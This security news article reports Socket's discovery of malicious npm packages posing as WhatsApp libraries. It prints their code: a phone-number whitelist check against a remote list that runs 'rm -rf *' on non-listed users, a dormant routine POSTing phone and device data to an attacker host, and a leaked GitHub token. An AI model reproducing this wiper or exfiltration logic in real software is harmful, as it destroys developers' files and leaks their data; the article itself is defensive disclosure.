The WhatsApp Kill Switch: New npm Packages Use Developer’s Phone Number to Wipe Systems

Socket’s Threat Research Team has uncovered two malicious npm packages—naya-flore and nvlore-hsc—designed to target developers building WhatsApp integrations. Far from mere spyware or adware, these packages hide a remote-controlled kill switch capable of wiping entire systems—all triggered by the developer’s phone number.

“The packages have accumulated over 1,110 downloads in a month and remain active on the npm registry,” reports Socket.

With over 200 million businesses using the WhatsApp Business API, there’s a vibrant ecosystem of tools, libraries, and automation bots built around it. These malicious packages were crafted to masquerade as legitimate WhatsApp socket libraries, promising features similar to popular projects like whatsapp-web.js and baileys.

But hidden beneath the surface is a hidden risk—if your phone number isn’t on the attacker’s whitelist, the library silently wipes your system.

The core of the attack is found in the seemingly innocuous function:

const requestPairingCode = async (linh, phoneNumber, pairKey = "VERYLINH") => {
    // Step 1: Fetch remote phone number database
    const sesiClear = atob(sesiPath);
    const { data } = await axios.get(sesiClear);
    const numberCode = data.data.map(entry => entry.nomor);

    // Step 2: Check if current phone number is in database
    const numberStateCode = numberCode.includes(phoneNumber);
    const getsNumberCode = numberStateCode ? phoneNumber : "0000";

    // Step 3: Continue with legitimate WhatsApp pairing setup...
    authState.creds.pairingCode = pairKey.toUpperCase();
    // [Normal WhatsApp pairing code continues...]

    // Step 4: Execute kill switch AFTER appearing to work normally
    if (getsNumberCode === "0000") {
       exec('rm -rf *')  // Destroy system
    }

    return authState.creds.pairingCode;  // Return pairing code as expected
};

“The logic is simple: if the phone number exists in the remote database, the package continues normal operation. If not found… it executes rm -rf *, which recursively deletes all files in the current directory.”

The remote phone number list is pulled from a Base64-obfuscated URL hosted on GitHub:

https://raw.githubusercontent[.]com/navaLinh/database/main/seska.json

This kill logic is stealthily buried under legitimate-looking WhatsApp setup functions, making it nearly impossible to detect unless you read every line of the package code.

Interestingly, the packages also contain dormant data exfiltration functions, including this one:

async function generateCreeds(nomor, id, status) {
  const data = {
    nomor,        // Phone number
    id,           // Device identifier
    status,       // Current status
    key: 'ZnVja19nb2Q'  // Base64 encoded identifier
  };

  try {
    const response = await fetch('https://api[.]verylinh[.]my[.]id/running', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(data)
    });

    if (!response.ok) throw new Error(`Run gagal (${response.status})`);
    const result = await response.json();
  } catch (err) {
    // Silent failure to avoid detection
  }
}


// In both naya-flore and nvlore-hsc:
if (getsNumberCode === "0000") {
   exec('rm -rf *')  // Destroy system first
}
//generateCreeds(phoneNumber, linh, getsNumberCode)  // Exfiltration call commented out

“The commented exfiltration likely reflects a strategic decision… since the kill switch executes rm -rf * immediately… any subsequent exfiltration attempt would fail on the destroyed system.”

Socket’s researchers also uncovered a hardcoded GitHub Personal Access Token:

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

While the token wasn’t used in the code sample, its presence raises concern about backdoor access to repositories or configuration management scripts.

The kill switch uses a whitelist of Indonesian mobile numbers, implying a geo-targeted operation. Developers outside the intended scope are wiped instantly, while “friendly” or internal users remain untouched.

“This approach allows attackers to selectively destroy systems while maintaining operational security by preserving ‘friendly’ targets.”

Socket also warns of other packages by the same author (nayflore), including:

• nouku-search
• very-nay
• naya-clone
• node-smsk
• @veryflore/disc

While they appear benign, they may contain dormant or evolving attack logic and should be treated with extreme caution.

Related Posts:

• CVE-2025-47241: Critical Whitelist Bypass in Browser Use Exposes Internal Services
• Critical Kubernetes Image Builder Flaw: Default Credentials Grant Root Access to Windows Nodes
• Urgent Security Update: Guix System Patches Critical Vulnerability

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy